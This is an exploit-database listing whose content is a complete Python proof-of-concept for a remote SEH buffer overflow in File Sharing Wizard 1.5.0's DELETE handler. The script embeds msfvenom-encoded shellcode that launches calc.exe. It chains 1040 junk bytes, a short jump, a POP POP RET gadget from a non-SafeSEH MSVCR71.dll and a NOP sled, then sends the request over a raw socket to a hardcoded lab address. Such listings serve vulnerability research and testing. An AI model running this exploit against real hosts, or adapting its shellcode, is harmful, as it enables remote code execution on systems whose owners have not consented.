Exploit for File Sharing Wizard 1.5.0 DELETE SEH Buffer Overflow

Name: Exploit for File Sharing Wizard 1.5.0 DELETE SEH Buffer Overflow
Rating: 5 (264 reviews)
2019-10-05 | CVSS 0.6
## https://sploitus.com/exploit?id=PACKETSTORM:154738
import socket  
from struct import *  
  
# Exploit Title: File sharing wizard 'DELETE' remote SEH overflow  
# Date: 10/4/2019  
# Exploit Author: Striker  
# Vendor Homepage: https://file-sharing-wizard.soft112.com/  
# Version: 1.5.0 Build on 26-8-2008  
# Tested on: Windows 7  
  
  
# File-sharing-wizard-seh  
  
host = "10.0.2.7"  
port = 80  
  
#msfvenom -a x86 --platform windows -p windows/exec CMD=calc.exe -e x86/alpha_mixed -f python  
  
buf = b""  
buf += b"\x89\xe7\xd9\xc2\xd9\x77\xf4\x58\x50\x59\x49\x49\x49"  
buf += b"\x49\x49\x49\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43"  
buf += b"\x37\x51\x5a\x6a\x41\x58\x50\x30\x41\x30\x41\x6b\x41"  
buf += b"\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x41\x42"  
buf += b"\x58\x50\x38\x41\x42\x75\x4a\x49\x4b\x4c\x7a\x48\x6b"  
buf += b"\x32\x55\x50\x53\x30\x57\x70\x43\x50\x4f\x79\x6a\x45"  
buf += b"\x50\x31\x79\x50\x33\x54\x4e\x6b\x66\x30\x54\x70\x6c"  
buf += b"\x4b\x71\x42\x34\x4c\x6e\x6b\x70\x52\x64\x54\x6c\x4b"  
buf += b"\x34\x32\x67\x58\x66\x6f\x58\x37\x70\x4a\x77\x56\x46"  
buf += b"\x51\x4b\x4f\x6e\x4c\x47\x4c\x31\x71\x61\x6c\x46\x62"  
buf += b"\x76\x4c\x67\x50\x7a\x61\x38\x4f\x64\x4d\x37\x71\x68"  
buf += b"\x47\x49\x72\x4c\x32\x70\x52\x61\x47\x6e\x6b\x73\x62"  
buf += b"\x72\x30\x6c\x4b\x31\x5a\x45\x6c\x6e\x6b\x72\x6c\x34"  
buf += b"\x51\x71\x68\x4b\x53\x61\x58\x53\x31\x78\x51\x52\x71"  
buf += b"\x4e\x6b\x50\x59\x75\x70\x53\x31\x7a\x73\x4e\x6b\x57"  
buf += b"\x39\x75\x48\x6a\x43\x74\x7a\x67\x39\x4e\x6b\x76\x54"  
buf += b"\x4e\x6b\x63\x31\x59\x46\x56\x51\x59\x6f\x4c\x6c\x49"  
buf += b"\x51\x78\x4f\x34\x4d\x33\x31\x58\x47\x50\x38\x39\x70"  
buf += b"\x32\x55\x79\x66\x37\x73\x33\x4d\x68\x78\x67\x4b\x63"  
buf += b"\x4d\x57\x54\x70\x75\x6b\x54\x46\x38\x4c\x4b\x73\x68"  
buf += b"\x47\x54\x56\x61\x79\x43\x35\x36\x4e\x6b\x56\x6c\x72"  
buf += b"\x6b\x6c\x4b\x31\x48\x47\x6c\x36\x61\x6e\x33\x4c\x4b"  
buf += b"\x75\x54\x6c\x4b\x37\x71\x5a\x70\x6d\x59\x50\x44\x34"  
buf += b"\x64\x55\x74\x33\x6b\x43\x6b\x70\x61\x31\x49\x53\x6a"  
buf += b"\x73\x61\x49\x6f\x79\x70\x53\x6f\x61\x4f\x51\x4a\x6c"  
buf += b"\x4b\x77\x62\x7a\x4b\x4e\x6d\x31\x4d\x53\x5a\x65\x51"  
buf += b"\x4c\x4d\x6c\x45\x48\x32\x35\x50\x57\x70\x47\x70\x70"  
buf += b"\x50\x45\x38\x45\x61\x4e\x6b\x62\x4f\x4c\x47\x6b\x4f"  
buf += b"\x7a\x75\x6d\x6b\x4c\x30\x68\x35\x4d\x72\x46\x36\x50"  
buf += b"\x68\x39\x36\x4d\x45\x4f\x4d\x4d\x4d\x6b\x4f\x78\x55"  
buf += b"\x77\x4c\x45\x56\x51\x6c\x56\x6a\x6f\x70\x49\x6b\x4d"  
buf += b"\x30\x50\x75\x46\x65\x4d\x6b\x33\x77\x66\x73\x53\x42"  
buf += b"\x62\x4f\x43\x5a\x75\x50\x53\x63\x39\x6f\x4e\x35\x62"  
buf += b"\x43\x53\x51\x62\x4c\x63\x53\x76\x4e\x35\x35\x61\x68"  
buf += b"\x62\x45\x33\x30\x41\x41"  
  
payload = "DELETE "  
payload += "A" * 1040 # junk  
payload += "\x90\x90\xeb\x16" # JMP short over SEH  
payload += "\xb5\xbb\x37\x7c" # POP POP RET  
# 0x7c37bbb5 : pop ecx # pop ecx # ret 0x08 | {PAGE_EXECUTE_READ} [MSVCR71.dll] ASLR: False, Rebase: False, SafeSEH: False, OS: False, v7.10.6030.0 (C:\Program Files\File Sharing Wizard\bin\MSVCR71.dll)  
payload += "\x90" * 50 # NOP  
payload += buf # shellcode  
payload += "D" *(5000 - len(payload))  
payload += " HTTP/1.1\r\n\r\n"  
  
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)  
s.connect((host, port))  
s.send(payload)  
s.close()